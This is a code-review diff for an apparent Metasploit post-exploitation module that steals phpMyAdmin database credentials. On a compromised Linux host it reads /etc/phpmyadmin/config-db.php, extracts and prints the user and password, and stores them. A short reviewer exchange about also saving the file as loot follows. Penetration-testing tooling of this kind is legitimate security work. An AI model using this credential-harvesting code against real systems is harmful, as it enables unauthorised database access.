modules/post/linux/gather/phpmyadmin_credsteal.rb

```diff
@@ -25,32 +25,46 @@ def initialize(info={})
     ))
    end
 
-  def run
+  def parse_creds(contents)
+    db_user = /\$dbuser=\'(.*)\';/.match(contents)
+    db_pass = /\$dbpass=\'(.*)\';/.match(contents)
+
+    unless db_user && db_pass
+      print_error("Couldn't find PhpMyAdmin credentials")
+      return
+    end
 
+    db_user = db_user[1]
+    db_pass = db_pass[1]
+    print_good("User: #{db_user}")
+    print_good("Password: #{db_pass}")
+
+    print_status("Storing credentials...")
+    store_valid_credential(user: db_user, private: db_pass)
+  end
+
+  def run
     print_line("\nPhpMyAdmin Creds Stealer!\n")
-    cred_dump = ""
 
     if session.platform.include?("windows")
       print_error("This module is not compatible with windows")
       return
     end
 
-    conf_path= "/etc/phpmyadmin/config-db.php"
+    conf_path = "/etc/phpmyadmin/config-db.php"
     unless file_exist?(conf_path)
       print_error("#{conf_path} doesn't exist on target")
       return
     end
 
     print_good('PhpMyAdmin config found!')
-    print_good("Extracting Creds")
     res = read_file(conf_path)
     unless res
       print_error("You may not have permissions to read the file.")
       return
     end
 
-    cred_dump << res
-    p = store_loot('phpmyadmin_conf', 'text/plain', session, cred_dump, 'phpmyadmin_conf.txt', 'phpmyadmin_conf')
```

Comment:
It might be nice to save the file as loot in case the parsing fails.

Reply:
Added that back. Thank you!